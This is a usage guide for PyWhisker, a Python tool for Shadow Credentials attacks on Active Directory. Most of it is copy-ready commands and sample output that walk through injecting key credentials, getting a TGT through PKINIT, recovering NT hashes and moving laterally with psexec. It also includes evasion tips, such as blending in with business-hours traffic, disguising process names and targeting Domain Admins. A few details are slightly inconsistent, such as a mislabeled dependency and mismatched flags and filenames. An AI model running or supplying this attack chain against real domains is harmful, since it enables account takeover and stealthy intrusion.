PyWhisker
PyWhisker is a Python implementation of Shadow Credentials attacks, allowing attackers to add Windows Hello for Business key credentials to Active Directory user or computer objects without knowing the target’s password. This enables PKINIT-based Kerberos pre-authentication to obtain a Ticket Granting Ticket (TGT).
Installation
Section titled “Installation”Via pip
Section titled “Via pip”pip install pywhisker
From GitHub
Section titled “From GitHub”git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
pip install -r requirements.txt
python pywhisker.py -h
Dependencies
Section titled “Dependencies”- ldap3 — LDAP operations and AD authentication
- dnfile — DNS name parsing
- impacket — Kerberos and network protocol support
- cryptography — Certificate and key handling
- asn1crypto — ASN.1 encoding/decoding
pip install ldap3 dnfile impacket cryptography asn1crypto
Quick Start
Section titled “Quick Start”Basic Shadow Credentials Addition
Section titled “Basic Shadow Credentials Addition”pywhisker -d example.com -u attacker -p 'Password123' --target victim_user --action add
List Existing Key Credentials
Section titled “List Existing Key Credentials”pywhisker -d example.com -u attacker -p 'Password123' --target victim_user --action list
Remove a Specific Credential
Section titled “Remove a Specific Credential”pywhisker -d example.com -u attacker -p 'Password123' --target victim_user --action remove --device-id <GUID>
How Shadow Credentials Work
Section titled “How Shadow Credentials Work”Windows Hello for Business
Section titled “Windows Hello for Business”Windows Hello for Business uses certificate-based authentication stored in the msDS-KeyCredentialLink multivalued attribute on AD objects. Each key credential contains:
- Public key certificate
- Device ID (GUID)
- Custom marshaled key credential data
msDS-KeyCredentialLink Attribute
Section titled “msDS-KeyCredentialLink Attribute”This AD attribute stores Windows Hello device credentials as KeyCredential structures. PyWhisker manipulates this attribute to inject attacker-controlled certificates, enabling authentication without the original password.
PKINIT Pre-Authentication
Section titled “PKINIT Pre-Authentication”With a certificate in msDS-KeyCredentialLink, an attacker can use Public Key Cryptography for Initial Authentication (PKINIT) to request a TGT from the Key Distribution Center (KDC) using the injected certificate and private key.
No Password Required
Section titled “No Password Required”The attack bypasses password-based authentication entirely. Once the credential is added, the attacker controls the private key and can authenticate as the target without knowing their password or NT hash.
Actions
Section titled “Actions”| Action | Purpose |
|---|---|
list | Enumerate existing key credentials on target object |
add | Inject a new Windows Hello key credential |
remove | Delete a specific credential by device ID |
clear | Remove all key credentials from target |
info | Display detailed information about a key credential |
List Action
Section titled “List Action”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action list
Output displays device IDs and timestamps of existing credentials.
Add Action
Section titled “Add Action”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action add
Generates a self-signed certificate and PFX file containing both certificate and private key. Output includes:
- PFX file path
- PFX password (required for usage)
- Device ID of new credential
Remove Action
Section titled “Remove Action”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action remove --device-id "12345678-1234-5678-1234-567812345678"
Requires the exact device ID from a previous list operation.
Clear Action
Section titled “Clear Action”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action clear
Removes all key credentials. Use cautiously to avoid disrupting legitimate Windows Hello enrollments.
Info Action
Section titled “Info Action”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action info --device-id "12345678-1234-5678-1234-567812345678"
Displays credential creation time and cryptographic details.
Authentication Options
Section titled “Authentication Options”Username and Password
Section titled “Username and Password”pywhisker -d example.com -u attacker -p 'MyPassword' --target victim --action add
Standard AD credentials with write permissions to target object.
NT Hash (Pass-the-Hash)
Section titled “NT Hash (Pass-the-Hash)”pywhisker -d example.com -u attacker -H 'aad3b435b51404eeaad3b435b51404ee' --target victim --action add
Use NT hash instead of plaintext password for authentication.
LDAPS (Encrypted LDAP)
Section titled “LDAPS (Encrypted LDAP)”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action add --use-ldaps
Uses LDAPS (port 636) for encrypted LDAP communication.
Domain Controller IP
Section titled “Domain Controller IP”pywhisker -d example.com -u attacker -p 'Password123' --target victim --dc-ip 192.168.1.10 --action add
Specify explicit DC IP instead of DNS resolution.
Kerberos Authentication
Section titled “Kerberos Authentication”pywhisker -d example.com -u attacker -k --target victim --action add
Uses Kerberos authentication (requires valid TGT in cache via kinit).
Adding Shadow Credentials
Section titled “Adding Shadow Credentials”Step 1: Inject Key Credential
Section titled “Step 1: Inject Key Credential”pywhisker -d example.com -u attacker -p 'Password123' --target 'victim' --action add
Output:
[+] Generating certificate...
[+] Writing PFX to keyCredential.pfx
[+] PFX Password: AsDfGhJk1234!
[+] Device ID: 12345678-abcd-ef01-2345-6789abcdef01
[+] Key Credential added successfully
Step 2: Request TGT with PKINIT
Section titled “Step 2: Request TGT with PKINIT”Using PKINITtools (gettgtpkinit.py):
python gettgtpkinit.py -cert-pfx keyCredential.pfx -pfx-pass 'AsDfGhJk1234!' \
-domain-netbios EXAMPLE -user-ccache victim.ccache example.com victim
Outputs Kerberos credential cache (.ccache file).
Step 3: Extract NT Hash
Section titled “Step 3: Extract NT Hash”Using PKINITtools (getnthash.py):
python getnthash.py -key 'a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6' \
EXAMPLE/victim victim_tgt.ccache
Recovers the target’s NT hash from the TGT session key (if PKINIT succeeds).
Full Attack Chain
Section titled “Full Attack Chain”1. Obtain Compromised Credentials
Section titled “1. Obtain Compromised Credentials”Start with credentials of a user with Write permissions to the target object (Domain Admin, Account Operator, or via ACL abuse).
2. Add Shadow Credential
Section titled “2. Add Shadow Credential”pywhisker -d example.com -u 'EXAMPLE\attacker' -p 'CompromisedPass' \
--target 'victim_user' --action add
Save the output PFX file and password.
3. Request TGT via PKINIT
Section titled “3. Request TGT via PKINIT”python gettgtpkinit.py -cert-pfx keyCredential.pfx -pfx-pass 'PFXPassword' \
-domain-netbios EXAMPLE -user-ccache victim.ccache example.com victim
4. Use TGT for Authentication
Section titled “4. Use TGT for Authentication”export KRB5CCNAME=victim.ccache
psexec.py -k -no-pass EXAMPLE/victim@target-host.example.com
Or dump the NT hash and perform pass-the-hash.
5. Clean Up
Section titled “5. Clean Up”pywhisker -d example.com -u attacker -p 'Password123' \
--target victim --action remove --device-id 'GUID-FROM-STEP-2'
Removing Credentials
Section titled “Removing Credentials”Remove Single Credential
Section titled “Remove Single Credential”pywhisker -d example.com -u attacker -p 'Password123' --target victim \
--action remove --device-id '12345678-abcd-ef01-2345-6789abcdef01'
Always clean up after engagement to avoid detection and system disruption.
Remove All Credentials
Section titled “Remove All Credentials”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action clear
Use with caution; ensures no credentials remain but may affect legitimate users.
Verify Removal
Section titled “Verify Removal”pywhisker -d example.com -u attacker -p 'Password123' --target victim --action list
Confirm target’s key credential list is empty.
Targeting Options
Section titled “Targeting Options”User Accounts
Section titled “User Accounts”pywhisker -d example.com -u attacker -p 'Password123' --target 'user@example.com' --action add
Target individual user objects for privilege escalation.
Computer Accounts
Section titled “Computer Accounts”pywhisker -d example.com -u attacker -p 'Password123' --target 'COMPUTER$' --action add
Target machine accounts for lateral movement and persistence.
Distinguished Name Format
Section titled “Distinguished Name Format”pywhisker -d example.com -u attacker -p 'Password123' \
--target 'CN=victim,CN=Users,DC=example,DC=com' --action add
Use full DN for clarity when sAMAccountName is ambiguous.
Troubleshooting
Section titled “Troubleshooting”LDAP Connection Errors
Section titled “LDAP Connection Errors”Error: Connection error: [Errno 61] Connection refused
Solution: Verify domain controller IP, confirm port 389 (LDAP) or 636 (LDAPS) is accessible, check firewall rules.
pywhisker -d example.com -u attacker -p 'Password123' -dc-ip 192.168.1.10 \
--target victim --action add
Permission Denied
Section titled “Permission Denied”Error: [!] Insufficient permissions to modify target object
Solution: Verify user has Write permissions to msDS-KeyCredentialLink. Check group membership (Domain Admin, Account Operators) or target ACLs.
Certificate Generation Failures
Section titled “Certificate Generation Failures”Error: [!] Failed to generate certificate
Solution: Ensure cryptography and asn1crypto are installed; reinstall dependencies.
pip install --upgrade cryptography asn1crypto
Target Not Found
Section titled “Target Not Found”Error: [!] Target object not found in Active Directory
Solution: Verify target sAMAccountName exists; use --target 'DOMAIN\username' format or full DN.
pywhisker -d example.com -u attacker -p 'Password123' \
--target 'EXAMPLE\victim' --action list
Best Practices
Section titled “Best Practices”Operational Security
Section titled “Operational Security”- Perform actions from compromised systems or secured jump hosts, not directly from attacker infrastructure
- Clean up credentials immediately after obtaining access
- Use LDAPS to encrypt LDAP traffic over the network
- Operate during normal business hours to blend with legitimate traffic
Privilege Requirements
Section titled “Privilege Requirements”- Ensure compromise provides sufficient AD permissions before attempting attacks
- Target users with high-value access (Domain Admins, database admins, backup operators)
- Consider ACL abuse to grant write permissions if not currently present
Detection Evasion
Section titled “Detection Evasion”- Monitor for unusual msDS-KeyCredentialLink modifications in logs
- Legitimate Windows Hello enrollment appears as well-spaced credentials
- Multiple rapid credential additions may trigger alerts
- Use legitimate tool names in process execution if possible
Evidence Handling
Section titled “Evidence Handling”- Document target DNs, device IDs, and timestamps for post-engagement cleanup
- Maintain records of all added credentials for systematic removal
- Test removal procedures in staging before production engagements
Related Tools
Section titled “Related Tools”| Tool | Purpose |
|---|---|
| Certipy | Python framework for Active Directory certificate abuse; includes shadow credential operations |
| Whisker | .NET implementation of Shadow Credentials attacks |
| PKINITtools | gettgtpkinit.py and getnthash.py for PKINIT-based TGT requests and NT hash recovery |
| Rubeus | .NET tooling for Kerberos abuse; can work with PKINIT certificates |
| ntlmrelayx | Relay NTLM authentication; useful for credential harvesting in attack chains |
| Impacket | Network protocol library; underlying support for PyWhisker functionality |
References
Section titled “References”- Microsoft: Windows Hello for Business technical overview
- Harmj0y’s research on Shadow Credentials and PKINIT attacks
- ShutdownRepo PyWhisker GitHub repository
- Certipy documentation on AD certificate abuse